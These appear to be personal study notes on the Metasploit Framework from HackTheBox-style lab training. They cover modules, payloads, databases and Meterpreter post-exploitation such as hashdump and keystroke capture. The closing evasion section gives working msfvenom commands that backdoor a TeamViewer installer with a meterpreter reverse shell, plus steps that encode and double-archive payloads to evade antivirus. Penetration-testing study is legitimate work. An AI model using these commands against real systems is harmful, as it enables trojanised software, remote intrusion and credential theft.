πŸ’ŽMetasploit Framework

A ruby based pen testing platform that allows you to write, test and execute exploits for various systems. By default all files reiside in /usr/share/metasploit-framework

MSF Engagement Structure

Divided into five categories

  • Enumeration

  • Preparation

  • Exploitation

  • Privilege Escalation

  • Post Exploitation

HTB

Starting Up

We can run msfconsole to start Metasploit

  • -q Quiet options, displays without banner

Modules

These are split into categories. They consist of exploits that are POCs that can be used to exploit common vulnerabilities in an automated manner.

There are many types of modules, these include

  • Auxiliary - Scanning, fuzzing

  • Exploits - Exploit a vulnerability

  • Post - Gather information and pivot deeper

  • Encoders - Ensure payloads are intact to their destination

  • etc.

We can search for a module and then use it by using:

search <name>

search <name> type:<exploit-type>


use <module-name>

use <module-number>


We can see more about the selected module with the info command

Once happy we can use show options to see all required parameters, and then set them with set <option> xxxxx

For example:

set RHOSTS 10.10.xx.x

setg RHOSTS 10.10.xx.x - sets a value until the program is closed

Targets

Unique OS identifiers are taken from the version of OS that is selected for the exploit module. The show targets command show displays all vulnerable targets for the selected module.

show targets

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   IE 7 on Windows XP SP3
  2   IE 8 on Windows XP SP3
  3   IE 7 on Windows Vista
  4   IE 8 on Windows Vista
  5   IE 8 on Windows 7
  6   IE 9 on Windows 7

set target 2

Payloads

Sent with the exploit to typically return a reverse connection to the attacker to establish a foothold.

Singles

Contains the exploit and shellcode. Designed to be more stable and are self-contained.

Stagers

Small and reliable they are used to perform a specific task. It waits on the attacker machine, ready to connect to the victim host once the stage is complete .

Used to set up a network connection between the attacker and victim. Metasploit will try the best payload and then revert to another one if necessary.

Stages

Payload components that are downloaded through a stagers module.

Provide advanced features with no limits such as a Meterpreter, they automatically use middle stagers.

Staged

Exploitation process that is modularized into different functions. Ultimately grants an attacker remote access to a machine if the stages work correctly.

Stage0

The initial shellcode is sent over the network to the target which will connect back to our machine if successful. Common names include

  • reverse_tcp

  • reverse_https

  • bind_tcp

Stage1

Meterpreter Payload

Resides completely in the memory of a remote host meaning no trace is left behind making it very hard to detect.

Once the payload is executed a new session is created spawning a meterpreter interface. This lets us load in plugins and offers us a host of options against the target:

show payloads

grep <payload-name> show payloads: For more control over the search

set payload <payload>

Encoders

Makes payloads compatible with different processor architectures and can help avoid anti-virus detection.

show encoders

msfvenom -a x86 --platform windows -p <PAYLOAD> LHOST=xxx LPORT=xxx -b "\x00 -f perl -e x64/shikata_ga_nai

We can use msf-virustotal with an API key to analyze our payloads.

msf-virustotal -k <API-key> -f exp.exe

Databases

Used to store all our results from entry points, issues and discovered credentials to name but a few. We can manage all the hosts we have analyzed.

The databases can also both be exported and imported.

First, make sure DB is setup

  • sudo service postgresql status

Then start the service

  • sudo systemctl start postgresql

Now we can create a new DB

  • sudo msfdb init

Check to see the status of the current DB

  • sudo msfdb status

Finally, we can start msfconsole and connect to the DB

  • sudo msfdb run

Workspaces

Like folders in a project, we can use them to sort results of scans, hosts and other information, like extracted IPs, subnets, networks or domains.

  • workspace

  • -a: add

  • -d: delete

  • workspace -a Target_1

Importing scan results

  • db_import <scan.nmap>

If we run hosts we can see a table of the host address IP, OS and other options

If we run services we can see a table of all the services by port and name

Nmap can also be run straight inside MSFconsole and the results will be saved in our database

  • db_nmap -sV -sS <IP>

Data Backup

  • db_export -f xml backup.xml

Credentials

Show you all credentials gathered from the target. We can also add credentials manually.

  • creds

  • creds -h

Loot

Shows all loot (hash dumps, passwords, shadow files)

  • loot

Plugins

Allow us more flexibility using the msfconsole as they can be loaded in to provide us with extra functionality during an assessment.

We can download and install new plugins, for example, the DarkOperator Plugin suite:

git clone https://github.com/darkoperator/Metasploit-Plugins
sudo cp ./Metasploit-Plugins/pentest.rb /usr/share/metasploit-framework/plugins/pentest.rb

A list of useful ones:

load nessus

load mimikatz

load railgun

load priv

Tools

Command line utilities that can be called from the msfconsole menu

Sessions

Msfconsole can manage multiple modules at once and this means we can have many sessions and switch between them as we wish.

  • sessions: Lists all active session

  • sessions -i <session-num>: Loads session by number

  • bg: Background the current session

Some modules will require a session to be set as a parameter

Jobs

We use this to look at currently active tasks running in the background and can terminate old ones to free up ports.

jobs

exploit -j: Runs exploit as background job

jobs -l: Lists running jobs

Meterpreter

  • Looking at system processes

  • Network configurations

  • Taking screenshots

  • Capturing keystrokes

  • Taking over the victim's web camera

Helpful commands:

  • getsystem = Attempts to elevate the privilege of the system

  • hashdump = Dumps contents of the SAM database

  • ? = Help command

  • upload download = Uploads/ Downloads file

It is stealthy to use, not only does it reside in memory and write nothing to the dick it now uses encryption (AES) to ensure confidentiality of data.

We can search, use and configure our exploit and payload as shown in the above sections.

Be aware that due to permission if we upload something as a payload we may not be able to remove it from the target leaving evidence that the target was compromised!

Writing and Importing Modules

If we find we are missing a certain module we can download it from exploitdb

searchsploit <exploit-name>

searchsploit -t <exploit-name> --exclude="<.ext>"

FILENAME => x.rb

cp ~/Downloads/x.rb /usr/share/metasploit-framework/modules/exploits/unix/webapp/x.rb
msfconsole -m /usr/share/metasploit-framework/modules/

loadpath /usr/share/metasploit-framework/modules/

reload_all

Msfvenom

Msfvenom Payloads

We can use Ncat as our listener or get a Meterpreter shell by using Metasploit, as shown below.

Once we've got a shell we can run

run post/multi/recon/local_exploit_suggester

This will give some suggestions on how further to exploit the machine.

We can also search for an exploit suggester outside of the session

search local exploit suggester

If the payload keeps failing we can sometimes get more information with the set option:

VERBOSE true

Firewall and IDS/IPS Evasion

Endpoint Protection

Refers to a localized device whose purpose it to protect a single host. Usually Antivirus or Antimalware Protection, Firewall and Anti DDOS are in one package.

  • BitDefender

  • Malwarebytes

Perimeter Protection

A physical or virtual device on the network perimiter edge. They provide access inside of a network from the outside (public to private).

Evasion Techniques

Most AVs rely on Signiture-based detection to detect malicious code inside of software. When unknown software is detected by AV software it is quarantined.

Embedding

We can use msfvenom to embed a payload inside of a legitimate .exe file, this hides the payload shell code deep inside the software lowering our detection chances.

Let's do this with TeamViewer_Setup.exe

msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5

Archives

Archiving a file, script, folder, executable, picture or any other content can help bypass AV scanning.

msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -e x86/shikata_ga_nai -a x86 --platform windows -o ~/test.js -i 5

Archiving it twice will lead to even lower detection rates from AVs

wget https://www.rarlab.com/rar/rarlinux-x64-612.tar.gz
Daikuru@htb[/htb]$ tar -xzvf rarlinux-x64-612.tar.gz && cd rar
Daikuru@htb[/htb]$ rar a ~/test.rar -p ~/test.js

Remove .RAR

mv test.rar test

Archive payload again

rar a test2.rar -p test

Remove .RAR again

mv test2.rar test2

Packers

Executable compression process where the payload is packed together with an .exe program and the decompression code in one file. When we run the decompression code and return a backdoored executable to its initial state, allowing for an even higher chance of evasion from AVs.

  • UPX packer

  • MPRESS

  • MEW

  • ExeStealth

Last updated

Was this helpful?